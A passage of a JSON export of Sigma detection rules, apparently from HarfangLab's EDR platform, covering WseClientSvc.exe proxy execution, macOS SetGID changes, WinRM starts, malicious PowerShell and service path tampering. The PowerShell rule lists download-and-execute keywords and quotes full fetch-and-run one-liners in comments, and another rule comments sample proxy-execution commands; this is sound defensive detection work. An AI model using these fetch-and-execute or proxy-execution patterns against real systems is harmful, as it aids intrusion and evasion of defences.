"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "47a08acb-8efd-42f4-a3cc-d3d5e2ef6352",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.079270Z",
"creation_date": "2026-03-23T11:45:34.079272Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.079276Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://web.archive.org/web/20221130181950/https://blog.huntresslabs.com/abusing-trusted-applications-a719219220f",
"https://github.com/op7ic/EDR-Testing-Script/blob/master/runtests.bat",
"https://attack.mitre.org/techniques/T1218/"
],
"name": "t1218_wseclientsvc.yml",
"content": "title: Suspicious WseClientSvc.exe Execution\nid: 47a08acb-8efd-42f4-a3cc-d3d5e2ef6352\ndescription: |\n Detects a suspicious execution of WseClientSvc.exe, possibly to proxy execution of malicious code.\n This binary, which is digitally signed by Microsoft, can be used to proxy execution of other binaries.\n Attackers may abuse it to bypass security restrictions.\n It is recommended to analyze the process responsible for the execution of WseClientSvc.exe and to look for any subsequent malicious actions performed by child processes.\nreferences:\n - https://web.archive.org/web/20221130181950/https://blog.huntresslabs.com/abusing-trusted-applications-a719219220f\n - https://github.com/op7ic/EDR-Testing-Script/blob/master/runtests.bat\n - https://attack.mitre.org/techniques/T1218/\ndate: 2022/12/04\nmodified: 2025/08/25\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.WseClientSvc\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.ProxyExecution\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_bin:\n - OriginalFileName: 'WseClientSvc.exe'\n - Image|endswith: '\\WseClientSvc.exe'\n\n selection_cmd:\n # WseClientSvc.exe pass_TestBin.exe calc.exe\n # WseClientSvc.exe lovelymalware calc.weirdext\n CommandLine|re: 'WseClientSvc\\.exe\\ .*\\ .*'\n\n exclusion_windows_server_essentials:\n CommandLine: '?:\\Program Files\\Windows Server\\Bin\\WseClientSvc.exe ?:\\Program Files\\Windows Server\\Bin\\SharedServiceHost.exe ?:\\Program Files\\Windows Server\\Bin\\HealthServiceConfig'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "47a08acb-8efd-42f4-a3cc-d3d5e2ef6352",
"rule_name": "Suspicious WseClientSvc.exe Execution",
"rule_description": "Detects a suspicious execution of WseClientSvc.exe, possibly to proxy execution of malicious code.\nThis binary, which is digitally signed by Microsoft, can be used to proxy execution of other binaries.\nAttackers may abuse it to bypass security restrictions.\nIt is recommended to analyze the process responsible for the execution of WseClientSvc.exe and to look for any subsequent malicious actions performed by child processes.\n",
"rule_creation_date": "2022-12-04",
"rule_modified_date": "2025-08-25",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1218"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "47ac6436-48f7-40f6-b73d-bb00d709a054",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.618334Z",
"creation_date": "2026-03-23T11:45:34.618336Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.618341Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md",
"https://attack.mitre.org/techniques/T1548/001/"
],
"name": "t1548_001_setgid_macos.yml",
"content": "title: SetGID Access Flag Set\nid: 47ac6436-48f7-40f6-b73d-bb00d709a054\ndescription: |\n Detects the SetGID bit being set on a file.\n This could be used by an attacker to execute a file with a different (and potentially more privileged) user group context.\n It is recommended to analyze the targeted binary as well as the process responsible for the setting change and look for privilege escalation and malicious binaries.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md\n - https://attack.mitre.org/techniques/T1548/001/\ndate: 2024/09/17\nmodified: 2025/10/29\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1548.001\n - attack.defense_evasion\n - attack.t1222.002\n - classification.macOS.Source.Filesystem\n - classification.macOS.Behavior.DefenseEvasion\n - classification.macOS.Behavior.PrivilegeEscalation\n - classification.macOS.Behavior.SystemModification\nlogsource:\n category: filesystem_event\n product: macos\ndetection:\n selection:\n Kind:\n - chmod\n - chmod2\n PrettyMode: '?????S???'\n ProcessImage|contains: '?'\n\n exclusion_install:\n Image: '/private/tmp/PKInstallSandbox.??????/Scripts/*'\n\n exclusion_common_folders:\n - ProcessParentImage|startswith:\n - '/Applications/'\n - '/Library/'\n - '/Users/*/Applications/'\n - '/Users/*/Library/'\n - ProcessGrandparentImage|startswith:\n - '/Applications/'\n - '/Library/'\n - '/Users/*/Applications/'\n - '/Users/*/Library/'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "47ac6436-48f7-40f6-b73d-bb00d709a054",
"rule_name": "SetGID Access Flag Set",
"rule_description": "Detects the SetGID bit being set on a file.\nThis could be used by an attacker to execute a file with a different (and potentially more privileged) user group context.\nIt is recommended to analyze the targeted binary as well as the process responsible for the setting change and look for privilege escalation and malicious binaries.\n",
"rule_creation_date": "2024-09-17",
"rule_modified_date": "2025-10-29",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1222.002",
"attack.t1548.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "47e04561-373f-46ad-9771-6e2f2074a8e5",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.083300Z",
"creation_date": "2026-03-23T11:45:34.083302Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.083306Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md#atomic-test-1---enable-windows-remote-management",
"https://learn.microsoft.com/en-us/powershell/scripting/learn/remoting/winrmsecurity?view=powershell-7.2",
"https://attack.mitre.org/techniques/T1021/006/"
],
"name": "t1021_006_start_winrm_service.yml",
"content": "title: WinRM Service Started\nid: 47e04561-373f-46ad-9771-6e2f2074a8e5\ndescription: |\n Detects the manual launch of the Windows Remote Management (WinRM) service via the net1.exe binary.\n Windows Remote Management is a common Windows service that is used to interact with a remote system and is used, in particular, by PowerShell Remoting.\n This can be used by an attacker to move laterally within an organisation.\n It is recommended to investigate any authentications following this alert to determine if this action is legitimate.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md#atomic-test-1---enable-windows-remote-management\n - https://learn.microsoft.com/en-us/powershell/scripting/learn/remoting/winrmsecurity?view=powershell-7.2\n - https://attack.mitre.org/techniques/T1021/006/\ndate: 2022/11/04\nmodified: 2025/03/31\nauthor: HarfangLab\ntags:\n - attack.lateral_movement\n - attack.t1021.006\n - attack.execution\n - attack.t1569.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.SystemModification\n - classification.Windows.Behavior.Lateralization\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_1:\n - Image|endswith: '\\net1.exe'\n # Renamed binaries\n - OriginalFileName: 'net1.exe'\n selection_2:\n CommandLine|contains|all:\n - ' start '\n - ' winrm'\n\n condition: all of selection_*\nlevel: medium\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "47e04561-373f-46ad-9771-6e2f2074a8e5",
"rule_name": "WinRM Service Started",
"rule_description": "Detects the manual launch of the Windows Remote Management (WinRM) service via the net1.exe binary.\nWindows Remote Management is a common Windows service that is used to interact with a remote system and is used, in particular, by PowerShell Remoting.\nThis can be used by an attacker to move laterally within an organisation.\nIt is recommended to investigate any authentications following this alert to determine if this action is legitimate.\n",
"rule_creation_date": "2022-11-04",
"rule_modified_date": "2025-03-31",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.lateral_movement"
],
"rule_technique_tags": [
"attack.t1021.006",
"attack.t1569.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "481011ca-b57e-4e3c-9c28-45b01b5589dd",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.091327Z",
"creation_date": "2026-03-23T11:45:34.091329Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.091334Z",
"rule_level": "medium",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://redcanary.com/blog/yellow-cockatoo/",
"https://redcanary.com/threat-detection-report/techniques/powershell/",
"https://twitter.com/Alh4zr3d/status/1566489367232651264",
"https://attack.mitre.org/techniques/T1059/001/"
],
"name": "t1059_001_powershell_exec_potential_malicious_script.yml",
"content": "title: Possible Execution of a Malicious PowerShell Script\nid: 481011ca-b57e-4e3c-9c28-45b01b5589dd\ndescription: |\n Detects suspicious patterns in PowerShell scripts that can indicate the execution of malicicious code.\n There is functionality in PowerShell scripts that are commonly abused by attackers, such as downloading data (payloads) and executing subsequent PowerShell code from an obfuscated first stage.\n It is recommended to read the PowerShell script as to determine its intent. If the PowerShell script is benign, it is highly recommended to whitelist the script as to avoid false positives.\nreferences:\n - https://redcanary.com/blog/yellow-cockatoo/\n - https://redcanary.com/threat-detection-report/techniques/powershell/\n - https://twitter.com/Alh4zr3d/status/1566489367232651264\n - https://attack.mitre.org/techniques/T1059/001/\ndate: 2021/06/25\nmodified: 2025/05/27\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1059.001\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.Behavior.FileDownload\n - classification.Windows.Behavior.CommandAndControl\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n exec:\n PowershellCommand|contains:\n - 'Invoke-Expression'\n - ' iex '\n - ' iex('\n - ' iex ('\n - ' iex;'\n - ' iex\"'\n - ' iex'''\n - '(iex '\n - '(iex('\n - '(iex ('\n - '(iex;'\n - '(iex\"'\n - '(iex'''\n - ';iex '\n - ';iex('\n - ';iex ('\n - ';iex;'\n - ';iex\"'\n - ';iex'''\n - '\"iex '\n - '\"iex('\n - '\"iex ('\n - '\"iex;'\n - '\"iex\"'\n - '\"iex'''\n - '''iex '\n - '''iex('\n - '''iex ('\n - '''iex;'\n - '''iex\"'\n - '''iex'''\n - '|iex'\n\n download:\n PowershellCommand|contains:\n - 'DownloadFile'\n - 'DownloadData'\n - 'DownloadString'\n - 'DeflateStream'\n - 'FromBase64String'\n - 'Invoke-WebRequest'\n\n # Invoke-WebRequest has an alias: iwr\n - ' iwr '\n - ' iwr('\n - ' iwr;'\n - ' iwr\"'\n - ' iwr'''\n - '(iwr '\n - '(iwr('\n - '(iwr;'\n - '(iwr\"'\n - '(iwr'''\n - ';iwr '\n - ';iwr('\n - ';iwr;'\n - ';iwr\"'\n - ';iwr'''\n - '\"iwr '\n - '\"iwr('\n - '\"iwr;'\n - '\"iwr\"'\n - '\"iwr'''\n - '''iwr '\n - '''iwr('\n - '''iwr;'\n - '''iwr\"'\n - '''iwr'''\n\n nslookup:\n PowershellCommand|contains|all:\n - 'nslookup'\n - '=txt'\n - '[-1]'\n\n exclusion_microsoft_signed:\n Signed: 'true'\n SignatureStatus: 'Valid'\n Signature: 'Microsoft Corporation'\n\n exclusion_modules:\n PowershellScriptPath|startswith:\n - '?:\\Program Files\\WindowsPowerShell\\Modules\\'\n - '?:\\program files\\powershell\\7\\Modules\\'\n\n assembly_load:\n PowershellCommand|contains: 'CurrentDomain.Load'\n\n # matches on something being compressed (gzip / deflate) and base64 encoded\n # and decompressed dynamically\n decompress_payload:\n PowershellCommand|contains:\n - 'DeflateStream'\n - 'GzipStream'\n\n PowershellCommand|contains|all:\n - '::FromBase64String'\n - '::Decompress'\n\n exclusion_chocolatey:\n PowershellCommand|contains: 'https://chocolatey.org/install.ps1'\n ProcessParentImage: '?:\\Windows\\explorer.exe'\n\n exclusion_chocolatey_community:\n # Set-ExecutionPolicy Bypass -Scope Process -Force; [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072; iex ((New-Object System.Net.WebClient).DownloadString('https://community.chocolatey.org/install.ps1'))\n # C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -NoProfile -InputFormat None -ExecutionPolicy Bypass -Command [System.Net.ServicePointManager]::SecurityProtocol = 3072; iex ((New-Object System.Net.WebClient).DownloadString('https://community.chocolatey.org/install.ps1'))\n # powershell Set-ExecutionPolicy Bypass -Scope Process -Force; [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072; iex ((New-Object System.Net.WebClient).DownloadString('https://chocolatey.org/install.ps1'))\n PowershellCommand|contains|all:\n - 'chocolatey.org/install.ps1'\n - 'DownloadString'\n - '::SecurityProtocol'\n - ' 3072'\n\n exclusion_chocolatey_upgrade:\n PowershellCommand|contains|all:\n - 'https://chocolatey.org/install.ps1'\n - '; choco upgrade -y'\n - '; Read-Host'\n - 'Type ENTER to exit'\n\n exclusion_microsoft_monitoring_agent:\n ProcessCommandLine: '?:\\Windows\\system32\\windowspowershell\\v1.0\\powershell.exe -NoLogo -Command ? ??:\\Program Files\\Microsoft Monitoring Agent\\Agent\\Health Service State\\Monitoring Host Temporary Files *\\LogEndToEndEvent.ps1?'\n\n exclusion_microsoft_system_center:\n ProcessImage: '?:\\Program Files\\Microsoft System Center\\Operations Manager\\Server\\MonitoringHost.exe'\n\n exclusion_powershell_utility:\n PowershellCommand|contains|all:\n - 'GUID=\"1DA87E53-152B-403E-98DC-74D7B4D63D59\"'\n - 'Author=\"Microsoft Corporation\"'\n - 'CmdletsToExport= \"Format-List\", \"Format-Custom\", \"Format-Table\", \"Format-Wide\",'\n - 'NestedModules=\"Microsoft.PowerShell.Commands.Utility.dll\",\"Microsoft.PowerShell.Utility.psm1\"'\n\n exclusion_ms_atp:\n PowershellScriptPath: '?:\\ProgramData\\Microsoft\\Windows Defender Advanced Threat Protection\\Downloads\\PSScript_*.ps1'\n\n exclusion_azure_ad_connect_health_adfs_agent:\n PowershellCommand|contains|all:\n - 'http://nist.time.gov/actualtime.cgi'\n - '$currentRtsTimeUtc = (New-Object -TypeName DateTime -ArgumentList (1970, 1, 1)).AddMilliseconds(([Xml]$request.Content).timestamp.time / 1000);'\n - 'Test-AdfsServerHealth'\n\n exclusion_poshssh:\n PowershellCommand|contains|all:\n - 'function Get-PoshSSHModVersion'\n - '$installed = (Get-Module -Name ?posh-SSH?).Version'\n - 'https://raw.github.com/darkoperator/Posh-SSH/master/'\n - '/Posh-SSH.psd1'\n - 'Write-Error ?Unable to locate Posh-SSH.?'\n\n # https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/run-analyzer-windows?view=o365-worldwide\n exclusion_mdeanalyzer:\n PowershellCommand|contains|all:\n - '# Initialize XML log - for consumption by external parser'\n - '$script:xmlDoc = [xml]\"\"'\n - 'HKLM:\\SOFTWARE\\Microsoft\\Windows Advanced Threat Protection'\n - 'Write-Host -ForegroundColor Green \"Please enter the full path to the document that was used during log collection. For example C:\\Users\\John Doe\\Desktop\\report.docx\"'\n - 'function Get-DLPEA {'\n - 'function Test-WPRError($ExitCode) {'\n\n exclusion_flarevm:\n PowershellScriptPath: '?:\\ProgramData\\_VM\\vm.common\\vm.common.psm1'\n PowershellCommand|contains|all:\n - '# Determine if file or directory should show item in right-click menu'\n - 'New-PSDrive -Name HKCR -PSProvider Registry -Root HKEY_CLASSES_ROOT | Out-Null'\n - 'VM Chocolatey Version'\n - 'VM Boxstarter Version'\n - '$chocoInfo = choco --version'\n - 'installedPackages = choco list -r'\n - '# Function for setting Services to manual startup'\n\n exclusion_ixbus:\n - ProcessGrandparentCommandLine: '*\\iXBus Serveur\\Plugins\\\\*\\service.exe'\n - PowershellScriptPath: '?:\\SRCI\\iXBs_Applications\\iXBus Serveur\\Framework\\\\*\\iXBs_InterfaceGF\\iXBs_*.psm1'\n\n exclusion_tanium:\n ProcessAncestors|contains: '|?:\\Program Files (x86)\\Tanium\\Tanium Client\\TaniumCX.exe|'\n\n exclusion_amazon:\n PowershellScriptPath: '?:\\ProgramData\\Amazon\\SSM\\InstanceData\\\\*\\document\\orchestration\\\\*\\PatchWindows\\_script.ps1'\n\n exclusion_national_instruments:\n ProcessGrandparentImage: '?:\\Program Files\\National Instruments\\Shared\\Skyline\\RabbitMQ\\erl-*\\bin\\erlsrv.exe'\n\n exclusion_nsclient:\n ProcessGrandparentImage: '?:\\Program Files\\NSClient++\\nscp.exe'\n\n exclusion_prtg:\n ProcessImage: '?:\\Program Files (x86)\\PRTG Network Monitor\\PowerShellScriptRunner.exe'\n ProcessParentImage: '?:\\Program Files (x86)\\PRTG Network Monitor\\PRTG Probe.exe'\n\n exclusion_cyberwatch:\n ProcessParentImage: '?:\\Program Files\\CYBERWATCH SAS\\CyberwatchAgent\\cyberwatch-agent.exe'\n\n exclusion_sillage:\n PowershellScriptPath: '?:\\sillage\\sillageMAJ.ps1'\n ProcessParentCommandLine|startswith: '?:\\windows\\system32\\cmd.exe /K CALL ?:\\sillage\\Sillage.bat '\n\n exclusion_intune:\n ProcessParentImage: '?:\\Program Files (x86)\\Microsoft Intune Management Extension\\AgentExecutor.exe'\n\n exclusion_alticap:\n PowershellScriptPath: '?:\\ProgramData\\Alticap\\rrd\\\\*.ps1'\n\n exclusion_siemens:\n PowershellScriptPath:\n - '?:\\Program Files\\Siemens\\LMS\\scripts\\CommonPSFunctions.psm1'\n - '?:\\Program Files\\Siemens\\syngo\\OperationalManagement\\HealthCheck\\HCx.ps1'\n\n # https://arpege.fr/\n exclusion_arpege:\n - PowershellScriptPath: '?:\\ARPEGE*\\produit\\admin\\res\\Modules_Persos\\Common-Commands\\Common-Commands.psm1'\n - ProcessParentCommandLine:\n - '?:\\Windows\\SYSTEM32\\cmd.exe /c ?:\\ARPEGE*\\produit\\admin\\Sauvegarde.bat'\n - '?:\\Windows\\SYSTEM32\\cmd.exe /c ?:\\ARPEGE*\\produit\\admin\\Sauvegarde.bat -Wait'\n\n exclusion_ninjaone:\n PowershellScriptPath: '?:\\ProgramData\\NinjaRMMAgent\\scripting\\customscript_gen_*.ps1'\n\n exclusion_itsplatform:\n ProcessParentImage: '?:\\Program Files (x86)\\ITSPlatform\\agentcore\\platform-agent-core.exe'\n\n exclusion_nodejs_parent:\n PowershellCommand|contains: 'iex ((New-Object System.Net.WebClient).DownloadString(?https://chocolatey.org/install.ps1?));'\n ProcessParentCommandLine:\n - '?:\\Windows\\system32\\cmd.exe /c ?:\\nodejs\\install_tools.bat'\n - '?:\\WINDOWS\\system32\\cmd.exe /c ?:\\Program Files\\nodejs\\install_tools.bat'\n exclusion_nodejs_grandparent:\n PowershellCommand|contains: 'iex ((New-Object System.Net.WebClient).DownloadString(?https://chocolatey.org/install.ps1?));'\n ProcessGrandparentCommandLine:\n - '?:\\Windows\\system32\\cmd.exe /c ?:\\nodejs\\install_tools.bat'\n - '?:\\Windows\\system32\\cmd.exe /c ?:\\Program Files\\nodejs\\install_tools.bat'\n\n exclusion_vcpkg:\n # https://github.com/microsoft/vcpkg-ce/blob/main/assets/scripts/ce.ps1\n - Sha256:\n - '90de3d6b442c1370644432e0bacd937023e2485882c1621cc2158e7a983a7996'\n - 'e03a66d7862e438aea9e75099cc7f46149b5d594ea2ba482a9d93c9d82d44270'\n - '7d370f1580f5c9a1fca316049015d6ca4d5ab83a467e142b2c35d8348961ad4f'\n - ProcessCommandLine:\n - '?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -NoProfile -ExecutionPolicy Unrestricted -Command iex (get-content \"?:\\Program Files\\Microsoft Visual Studio\\\\*\\VC\\vcpkg\\vcpkg-init.cmd\" -raw)#'\n - '?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -NoProfile -ExecutionPolicy Unrestricted -Command iex (get-content \"?:\\Program Files (x86)\\Microsoft Visual Studio\\\\*\\VC\\vcpkg\\vcpkg-init.cmd\" -raw)#'\n - '?:\\Program Files\\PowerShell\\7\\pwsh.exe -NoProfile -ExecutionPolicy Unrestricted -Command iex (get-content \"?:\\Program Files\\Microsoft Visual Studio\\\\*\\VC\\vcpkg\\vcpkg-init.cmd\" -raw)#'\n - '?:\\Program Files\\PowerShell\\7\\pwsh.exe -NoProfile -ExecutionPolicy Unrestricted -Command iex (get-content \"?:\\Program Files (x86)\\Microsoft Visual Studio\\\\*\\VC\\vcpkg\\vcpkg-init.cmd\" -raw)#'\n\n exclusion_ansible:\n # https://github.com/sergeycherepanov/devbrew/blob/master/ansible/ansible/executor/powershell/bootstrap_wrapper.ps1\n Sha256: 'c38ed3d1c2ad1af1755a9eee278018ed5fd8546f77fe685f60e4b8a40fe939c2'\n\n condition: ((exec and download) or (assembly_load and download) or decompress_payload or nslookup) and not 1 of exclusion_*\nlevel: medium\n#level: high\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "481011ca-b57e-4e3c-9c28-45b01b5589dd",
"rule_name": "Possible Execution of a Malicious PowerShell Script",
"rule_description": "Detects suspicious patterns in PowerShell scripts that can indicate the execution of malicicious code.\nThere is functionality in PowerShell scripts that are commonly abused by attackers, such as downloading data (payloads) and executing subsequent PowerShell code from an obfuscated first stage.\nIt is recommended to read the PowerShell script as to determine its intent. If the PowerShell script is benign, it is highly recommended to whitelist the script as to avoid false positives.\n",
"rule_creation_date": "2021-06-25",
"rule_modified_date": "2025-05-27",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1059.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "4810ee12-e776-458e-8cb5-280d7850f8dd",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.075442Z",
"creation_date": "2026-03-23T11:45:34.075444Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.075448Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md#atomic-test-2---service-imagepath-change-with-regexe",
"https://attack.mitre.org/techniques/T1574/011/"
],
"name": "t1574_011_powershell_registered_as_service_path.yml",
"content": "title: Service Binary Path Modified to powershell.exe\nid: 4810ee12-e776-458e-8cb5-280d7850f8dd\ndescription: |\n Detects the modification of a service's binary path to point to powershell.exe.\n This technique can be used by adversaries to establish persistence and/or privilege escalation to the account context the service is set to execute under (local/domain account, SYSTEM, LocalService, or NetworkService).\n It is recommended to investigate the new binary path as well as the binary performing the modification to look for malicious behaviors.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md#atomic-test-2---service-imagepath-change-with-regexe\n - https://attack.mitre.org/techniques/T1574/011/\ndate: 2022/12/23\nmodified: 2025/01/31\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.011\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.ConfigChange\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject: 'HKLM\\SYSTEM\\CurrentControlSet\\Services\\\\*\\ImagePath'\n Details|endswith: 'powershell.exe'\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "4810ee12-e776-458e-8cb5-280d7850f8dd",
"rule_name": "Service Binary Path Modified to powershell.exe",
"rule_description": "Detects the modification of a service's binary path to point to powershell.exe.\nThis technique can be used by adversaries to establish persistence and/or privilege escalation to the account context the service is set to execute under (local/domain account, SYSTEM, LocalService, or NetworkService).\nIt is recommended to investigate the new binary path as well as the binary performing the modification to look for malicious behaviors.\n",
"rule_creation_date": "2022-12-23",
"rule_modified_date": "2025-01-31",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.011"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "4834c68c-17e1-41ea-aad1-8b8221b11796",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.080295Z",
"creation_date": "2026-03-23T11:45:34.080297Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.080301Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_rdvghelper.yml",
